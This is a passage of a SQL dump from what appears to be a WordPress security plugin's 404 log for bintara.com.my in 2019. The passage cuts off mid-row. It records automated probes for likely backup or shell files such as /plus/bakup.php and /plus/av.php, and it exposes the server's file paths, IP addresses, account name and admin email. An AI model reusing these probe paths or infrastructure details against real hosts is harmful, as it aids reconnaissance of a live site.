EDIRECT_SCRIPT_URL\";s:39:\"/plugins/weathermap/configs/test404.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZybKFQ75tQHORtJE8pm2gAAAEQ\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"119.187.228.206\";s:11:\"REMOTE_PORT\";s:5:\"64457\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:61:\"https://bintara.com.my/plugins/weathermap/configs/test404.php\";s:10:\"SCRIPT_URL\";s:39:\"/plugins/weathermap/configs/test404.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZybKFQ75tQHORtJE8pm2gAAAEQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570544424.4897\";s:12:\"REQUEST_TIME\";s:10:\"1570544424\";}}','notice','2019-10-08 14:20:26','2019-10-08 14:20:24',35067408,36868040,'https://bintara.com.my/plugins/weathermap/configs/test404.php',1,0,'119.187.228.206'),(27826,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:59:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/plus/bakup.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:13:\"56.163.78.232\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=fd9f7a4738a970a7066c2e2a28c962a5\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"56.163.78.232\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/bakup.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:15:\"/plus/bakup.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6YKeBT1onqG4TOWhlFywAAARU\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/bakup.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:15:\"/plus/bakup.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6YKeBT1onqG4TOWhlFywAAARU\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/bakup.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/plus/bakup.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ6YKeBT1onqG4TOWhlFywAAARU\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"183.158.132.12\";s:11:\"REMOTE_PORT\";s:5:\"60794\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/bakup.php\";s:10:\"SCRIPT_URL\";s:15:\"/plus/bakup.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ6YKeBT1onqG4TOWhlFywAAARU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570674729.3776\";s:12:\"REQUEST_TIME\";s:10:\"1570674729\";}}','notice','2019-10-10 02:32:11','2019-10-10 02:32:09',35053480,36862168,'https://bintara.com.my/plus/bakup.php',1,0,'56.163.78.232'),(27825,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:59:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/plus/backup.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:15:\"139.117.160.252\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=87e1d08c728d00eefdd0b47a9a383d18\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"139.117.160.252\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/plus/backup.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:16:\"/plus/backup.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6YIeBT1onqG4TOWhlFxAAAARI\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/plus/backup.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:16:\"/plus/backup.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6YIeBT1onqG4TOWhlFxAAAARI\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/plus/backup.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/plus/backup.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ6YIeBT1onqG4TOWhlFxAAAARI\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"183.158.132.12\";s:11:\"REMOTE_PORT\";s:5:\"60475\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/plus/backup.php\";s:10:\"SCRIPT_URL\";s:16:\"/plus/backup.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ6YIeBT1onqG4TOWhlFxAAAARI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570674721.6089\";s:12:\"REQUEST_TIME\";s:10:\"1570674721\";}}','notice','2019-10-10 02:32:03','2019-10-10 02:32:02',35054408,36862216,'https://bintara.com.my/plus/backup.php',1,0,'139.117.160.252'),(27824,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:59:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/plus/av.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:13:\"109.6.161.115\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=7d0d378391a48f2a79b52e46c50f6177\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"109.6.161.115\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/plus/av.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:12:\"/plus/av.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6YE@BT1onqG4TOWhlFtwAAARM\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/plus/av.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:12:\"/plus/av.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6YE@BT1onqG4TOWhlFtwAAARM\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/plus/av.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/plus/av.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ6YE@BT1onqG4TOWhlFtwAAARM\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"183.158.132.12\";s:11:\"REMOTE_PORT\";s:5:\"60037\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"https://bintara.com.my/plus/av.php\";s:10:\"SCRIPT_URL\";s:12:\"/plus/av.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ6YE@BT1onqG4TOWhlFtwAAARM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570674707.2621\";s:12:\"REQUEST_TIME\";s:10:\"1570674707\";}}','notice','2019-10-10 02:31:48','2019-10-10 02:31:47',35055104,36863152,'https://bintara.com.my/plus/av.php',1,0,'109.6.161.115'),(27637,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:24:\"/?page_id=18/contact.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:131:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 UBrowser/7.0.185.1002 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:22:\"page_id=18/contact.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"191.96.242.118\";s:11:\"REMOTE_PORT\";s:5:\"34420\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZsb9k1o81Ms4j7YQaM0NwAAAAY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570446327.6349\";s:12:\"REQUEST_TIME\";s:10:\"1570446327\";}}','notice','2019-10-07 11:05:45','2019-10-07 11:05:31',35427952,37241568,'https://bintara.com.my/?page_id=18/contact.php',1,0,'191.96.242.118'),(27635,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:24:\"/?page_id=18/contact.php\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_KEEP_ALIVE\";s:2:\"15\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:22:\"page_id=18/contact.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"136.243.199.108\";s:11:\"REMOTE_PORT\";s:5:\"57811\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZsZL6NnKQNBk6r3IXk0-gAAAQE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1570445615.531\";s:12:\"REQUEST_TIME\";s:10:\"1570445615\";}}','notice','2019-10-07 10:53:37','2019-10-07 10:53:35',35021960,36832736,'https://bintara.com.my/?page_id=18/contact.php',1,0,'136.243.199.108'),(27636,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:40:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:32:\"/product/teamviewer-12-corporate\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-us,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:38:\"Mozilla/5.0 (compatible;CLcrawler/1.0)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:54:\"https://bintara.com.my/product/teamviewer-12-corporate\";s:19:\"REDIRECT_SCRIPT_URL\";s:32:\"/product/teamviewer-12-corporate\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZsa86NnKQNBk6r3IXk14wAAARg\";s:12:\"REDIRECT_URL\";s:32:\"/product/teamviewer-12-corporate\";s:11:\"REMOTE_ADDR\";s:14:\"188.68.226.100\";s:11:\"REMOTE_PORT\";s:5:\"46145\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:54:\"https://bintara.com.my/product/teamviewer-12-corporate\";s:10:\"SCRIPT_URL\";s:32:\"/product/teamviewer-12-corporate\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XZsa86NnKQNBk6r3IXk14wAAARg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1570446067.545\";s:12:\"REQUEST_TIME\";s:10:\"1570446067\";}}','notice','2019-10-07 11:01:09','2019-10-07 11:01:07',35029912,36834808,'https://bintara.com.my/product/teamviewer-12-corporate',1,0,'188.68.226.100'),(27634,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:24:\"/?page_id=18/contact.php\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_KEEP_ALIVE\";s:2:\"15\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:22:\"page_id=18/contact.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"136.243.199.108\";s:11:\"REMOTE_PORT\";s:5:\"57314\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZsZGLctZvnRcEsjCpdGEAAAAIQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570445592.1595\";s:12:\"REQUEST_TIME\";s:10:\"1570445592\";}}','notice','2019-10-07 10:53:14','2019-10-07 10:53:12',35021960,36832736,'https://bintara.com.my/?page_id=18/contact.php',1,0,'136.243.199.108'),(27633,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:24:\"/?page_id=18/contact.php\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_KEEP_ALIVE\";s:2:\"15\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 